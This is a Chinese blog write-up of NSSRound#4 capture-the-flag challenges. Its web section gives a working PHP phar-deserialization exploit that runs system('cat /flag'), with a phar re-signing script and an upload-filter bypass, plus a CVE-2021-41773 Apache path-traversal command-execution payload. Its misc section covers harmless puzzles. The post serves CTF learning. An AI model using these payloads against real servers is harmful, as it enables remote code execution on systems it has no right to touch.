[NSSRound#4] 复现

ThnPkm

已于 2022-08-12 23:32:36 修改

阅读量1.1k

点赞数 1

分类专栏：比赛wp 文章标签： php 安全网络协议 ctf 开发语言

于 2022-08-12 23:18:28 首次发布

本文链接：https://blog.csdn.net/qq_61768489/article/details/126293656

版权

比赛wp 专栏收录该内容

13 篇文章 1 订阅

订阅专栏

Web

1zweb

直接能非预期读出来flag

1zweb(revenge)

就是上题的预期解

文件上传、反序列化、PHP伪协议

index.php

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

file_get_content可以触发phar反序列化，只需绕过__wakeup即可

<?php
class LoveNss{
    public $ljt="Misc";
    public $dky="Re";
    public $cmd="system('cat /flag');";
}

$a = new LoveNss();
echo serialize($a);

# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

由于需要绕过wakeup，因为是后面自己去改的数据，而phar文件的签名是第一次生成文件的时候自动生成的，所以当我们修改数据过后，由于签名错误，这个phar是无法被正常解析的，所以需要修改签名，让他变成一个正常的phar文件还需要对phar文件进行修改

from hashlib import sha1

file = open('poc.phar', 'rb').read() # 需要重新生成签名的phar文件

data = file[:-28] # 获取需要签名的数据

final = file[-8:] # 获取最后8位GBMB标识和签名类型

newfile = data+sha1(data).digest()+final # 数据 + 签名 + 类型 + GBMB

open('newpoc.phar', 'wb').write(newfile) # 写入到新的phar文件

upload.php

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}

这里对文件后后缀进行了白名单，也对phar文件内容进行了检测，伪了绕过这两点

将文件压缩为zip文件，并把后缀改为png文件，这样文件内容和后缀白名单检测都绕过了

我们可以使用phar伪协议

file=phar://./upload/123.png/newpoc.phar

ez_rce

CVE-2021-41773

Apache2.4.49 有目录穿越漏洞

如果服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

这里制造了一个文件夹迷宫，四层（靠经验和尝试了）

集束炸弹爆破出路径四个变量都0~9

MISC

Signin

给了一个dockerfile

导入了一个hggg/flag:v0镜像，然后将镜像中FLAG环境变量的数据写入了flag.txt文件之中。
通过DockerHub查看镜像的细节：

在操作历史中，就可以看到对FLAG这个环境变量的操作历史

Pixel_Signin

提取像素点数据 31*31

from PIL import Image
result = open('1.txt','w+')
img = Image.open("Pixel_Signin.png")
img = img.convert('RGB')
for i in range(31):
    for j in range(31):
        r,g,b = img.getpixel((j,i))
        print(r,g,b,file=result)

得到的数据都是在ASCII可见字符范围内，拿取转ASCII

这串数据凯撒或rot13

NSSCTF{Haruki_is_NSS_SUPERMAN_so_this_task_is_easy}

Knight's Tour!

zip打不开，是把zip文件头换成rar了，换回去

下面组成的话和题目都指向 Knight‘s Tour ，一个棋类游戏

可以看到下面的句子跟原棋盘数量一样，也就是我们要给原棋盘涂色，玩完之后能组成下面的句子并且颜色相符。

涂完之后红黄转01二进制，然后ASCII

Type Message

手机键盘

听一下音频，就是手机拨号码的声音

四个字母有信息DTMF 解密手机键盘拨号

Detect DTMF Tones

627474238133 3118161334374 7333221535393 322217493

NSSCTF DTMFIS REALLY EASY =》 NSSCTF{DTMFISREALLYEASY}

ThnPkm

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
2
评论
[NSSRound#4] 复现

可以看到下面的句子跟原棋盘数量一样，也就是我们要给原棋盘涂色，玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的，所以需要修改签名，让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的，所以当我们修改数据过后，由于签名错误，这个。将文件压缩为zip文件，并把后缀改为png文件，这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单，也对phar文件内容进行了检测，伪了绕过这两点。zip打不开，是把zip文件头换成rar了，换回去。.....
复制链接

扫一扫